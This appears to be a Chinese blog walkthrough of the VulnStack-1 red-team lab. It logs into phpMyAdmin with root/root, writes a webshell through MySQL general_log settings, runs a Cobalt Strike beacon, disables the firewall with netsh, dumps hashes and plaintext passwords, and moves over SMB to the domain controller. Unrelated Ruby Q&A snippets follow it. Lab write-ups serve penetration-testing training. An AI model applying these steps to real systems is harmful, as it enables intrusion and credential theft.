草庐IT

红日安全内网渗透靶场-VulnStack-1

w3z21 2023-03-28 原文

0x00.网络拓扑

0x01.环境搭建

一共有三台虚拟机Win7(对外),Win2003和Win2008(对内)

  • Win2003:添加一张网卡(VMnet1)
  • Win2008:添加一张网卡(VMnet1)
  • Win7:添加两张网卡(VMnet1,VMnet8)
    网络环境配置完成之后首先打开Win2008,使用默认账号GOD\liukaifeng01,密码hongrisec@2019进行登录,登录后提示密码已过期,修改新密码之后重启即可,然后切换到GOD\Administrator用户重复前面的操作,重启Win2008后打开另外两台机器,在Win7上打开Phpstudy服务

Win2008:

Win7:

开启Phpstudy后访问本机web页面查看服务是否正常

至此环境搭建完成.

0x02.信息收集

Nmap扫描目标端口,检测服务

发现目标开启Web服务和数据库服务,访问目标Web服务

发现探针页面,使用dirsearch扫描网站目录

发现存在phpmyadmin

0x03.漏洞探测

直接尝试弱口令登录,root/root成功登录

登录phpmyadmin后可以尝试into outfile写文件getshell或者日志getshell

写文件getshell首先查看数据库是否有读写文件权限

secure_file_priv=null 则数据库没有读写文件权限,那么换另外一种方法,使用日志getshell

0x04.漏洞利用

general_log=OFF 则日志功能关闭,先将日志功能打开然后修改日志保存路径到网站目录下


SET GLOBAL general_log="log" 打开日志功能

SET GLOBAL general_log_file="C:/phpStudy/WWW/loglog.php" 修改日志保存路径在网站根目录下

修改成功

直接写入一句话木马getshell

访问日志文件,成功getshell


使用蚁剑连接刚刚写入的webshell,进入虚拟终端执行whoami查看当前用户

ipconfig查看网卡信息发现有两张网卡,一张通往外网,一张为内网

猜测内网有其他机器,利用Cobalt Strike生成后门并上传 进行权限提升

0x05.内网信息收集

创建监听器

生成后门,监听器选择刚刚创建的监听器

将后门文件上传至靶机

在蚁剑中使用虚拟终端运行后门文件,运行完成后CS中靶机已经上线

sleep 0 设置回连间隔为0s

shell whoami 查看当前用户

shell hostname 查看主机名

shell net users 查看靶机上存在的用户


shell systeminfo 查看靶机信息

shell tasklist 查看靶机进程

收集完靶机基本信息后接下来判断内网是否存在"域"

shell net config workstation 发现存在域GOD,且域内有三台主机

shell net view /domain:god 查看域内主机

0x06.权限提升

选择自带权限提升功能

选择监听器和提权方式


提权成功会以system身份新上线一个会话

0x07.横向移动

在进行横向移动前先将防火墙关闭

shell netsh firewall show state 检查防火墙状态

shell netsh advfirewall set allprofiles state off 关闭防火墙

点击目标列表可以查看当前域内的所有目标

shell dclist 查看域控列表

hashdump抓取本机用户哈希密码

logonpasswords获取明文密码

查看密码凭证

接下来准备攻击域控

首先创建一个smb监听器


横向移动到域控,用户名和密码选择刚刚获取到的,监听器选择创建的SMB监听器,会话任选一个即可

点击运行后域控成功上线

接着对域成员进行攻击


和攻击域控一样的方法,监听器选择SMB,会话选择域控

至此,拿下内网全部主机

有关红日安全内网渗透靶场-VulnStack-1的更多相关文章

  1. ruby - 如何使用 Ruby aws/s3 Gem 生成安全 URL 以从 s3 下载文件 - 2

    我正在编写一个小脚本来定位aws存储桶中的特定文件,并创建一个临时验证的url以发送给同事。(理想情况下,这将创建类似于在控制台上右键单击存储桶中的文件并复制链接地址的结果)。我研究过回形针,它似乎不符合这个标准,但我可能只是不知道它的全部功能。我尝试了以下方法:defauthenticated_url(file_name,bucket)AWS::S3::S3Object.url_for(file_name,bucket,:secure=>true,:expires=>20*60)end产生这种类型的结果:...-1.amazonaws.com/file_path/file.zip.A

  2. ruby - 如何安全地删除文件? - 2

    在Ruby中是否有Gem或安全删除文件的方法?我想避免系统上可能不存在的外部程序。“安全删除”指的是覆盖文件内容。 最佳答案 如果您使用的是*nix,一个很好的方法是使用exec/open3/open4调用shred:`shred-fxuz#{filename}`http://www.gnu.org/s/coreutils/manual/html_node/shred-invocation.html检查这个类似的帖子:Writingafileshredderinpythonorruby?

  3. ruby - 用 YAML.load 解析 json 安全吗? - 2

    我正在使用ruby2.1.0我有一个json文件。例如:test.json{"item":[{"apple":1},{"banana":2}]}用YAML.load加载这个文件安全吗?YAML.load(File.read('test.json'))我正在尝试加载一个json或yaml格式的文件。 最佳答案 YAML可以加载JSONYAML.load('{"something":"test","other":4}')=>{"something"=>"test","other"=>4}JSON将无法加载YAML。JSON.load("

  4. ruby-on-rails - 安全地显示使用回形针 gem 上传的图像 - 2

    默认情况下:回形针gem将所有附件存储在公共(public)目录中。出于安全原因,我不想将附件存储在公共(public)目录中,所以我将它们保存在应用程序根目录的uploads目录中:classPost我没有指定url选项,因为我不希望每个图像附件都有一个url。如果指定了url:那么拥有该url的任何人都可以访问该图像。这是不安全的。在user#show页面中:我想实际显示图像。如果我使用所有回形针默认设置,那么我可以这样做,因为图像将在公共(public)目录中并且图像将具有一个url:Someimage:看来,如果我将图像附件保存在公共(public)目录之外并且不指定url(同

  5. ruby - 使写入文件线程安全 - 2

    我在一个ruby​​文件中有一个函数可以像这样写入一个文件File.open("myfile",'a'){|f|f.puts("#{sometext}")}这个函数在不同的线程中被调用,使得像上面这样的文件写入不是线程安全的。有谁知道如何以最简单的方式使这个文件写入线程安全?更多信息:如果重要的话,我正在使用rspec框架。 最佳答案 您可以通过File#flock给锁File.open("myfile",'a'){|f|f.flock(File::LOCK_EX)f.puts("#{sometext}")}

  6. ruby-on-rails - 最灵活的 Rails 密码安全实现 - 2

    关闭。这个问题不符合StackOverflowguidelines.它目前不接受答案。要求我们推荐或查找工具、库或最喜欢的场外资源的问题对于StackOverflow来说是偏离主题的,因为它们往往会吸引自以为是的答案和垃圾邮件。相反,describetheproblem以及迄今为止为解决该问题所做的工作。关闭8年前。Improvethisquestion我需要实现具有各种灵活需求的密码安全。这些要求基本上取自Sanspasswordpolicy:Strongpasswordshavethefollowingcharacteristics:Containatleastthreeofthe

  7. 常见网络安全产品汇总(私信发送思维导图) - 2

    安全产品安全网关类防火墙Firewall防火墙防火墙主要用于边界安全防护的权限控制和安全域的划分。防火墙•信息安全的防护系统,依照特定的规则,允许或是限制传输的数据通过。防火墙是一个由软件和硬件设备组合而成,在内外网之间、专网与公网之间的界面上构成的保护屏障。下一代防火墙•下一代防火墙,NextGenerationFirewall,简称NGFirewall,是一款可以全面应对应用层威胁的高性能防火墙,提供网络层应用层一体化安全防护。生产厂家•联想网御、CheckPoint、深信服、网康、天融信、华为、H3C等防火墙部署部署于内、外网编辑额,用于权限访问控制和安全域划分。UTM统一威胁管理(Un

  8. python - 这些脚本语言中哪种更适合渗透测试? - 2

    关闭。这个问题是opinion-based.它目前不接受答案。想要改进这个问题?更新问题,以便editingthispost可以用事实和引用来回答它.关闭9年前。Improvethisquestion首先,我想避免一场关于语言的口水战。可供选择的语言有Perl、Python和Ruby。我想提一下,我对所有这些都很满意,但问题是我不能只专注于一个。例如,如果我看到一个很棒的Perl模块,我必须尝试一下。如果我看到一个不错的Python应用程序,我必须知道它是如何制作的。如果我看到RubyDSL或一些Ruby巫术,我就会迷上Ruby一段时间。目前我是一名Java开发人员,但计划在不久的将来

  9. ruby - 为什么我必须对 Net::HTTP 请求的安全字符进行 URI.encode? - 2

    我尝试使用Net::HTTP向Twitter发送GET请求(出于隐私原因替换了用户ID):url=URI.parse("http://api.twitter.com/1/friends/ids.json?user_id=12345")resp=Net::HTTP.get_response(url)这会在Net::HTTP中引发异常:NoMethodError:undefinedmethodempty?'for#from/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/1.8/net/http.rb:1

  10. 使用时 Rubygems 2.0.14 不是线程安全的 bundle 程序安装消息 - RUBYGEMS VERSION : 2. 4.5.1 - 2

    运行bundle安装时,我收到以下消息:Rubygems2.0.14isnotthreadsafe,soyourgemswillbeinstalledoneatatime.UpgradetoRubygems2.1.0orhighertoenableparallelgeminstallation.这很奇怪,因为在我的RubyGems环境中它说我的RubyGems版本是:2.4.5.1(见下文)~/w/Rafftopia❯❯❯gemenvRubyGemsEnvironment:-RUBYGEMSVERSION:2.4.5.1-RUBYVERSION:2.2.5(2016-04-26patc

随机推荐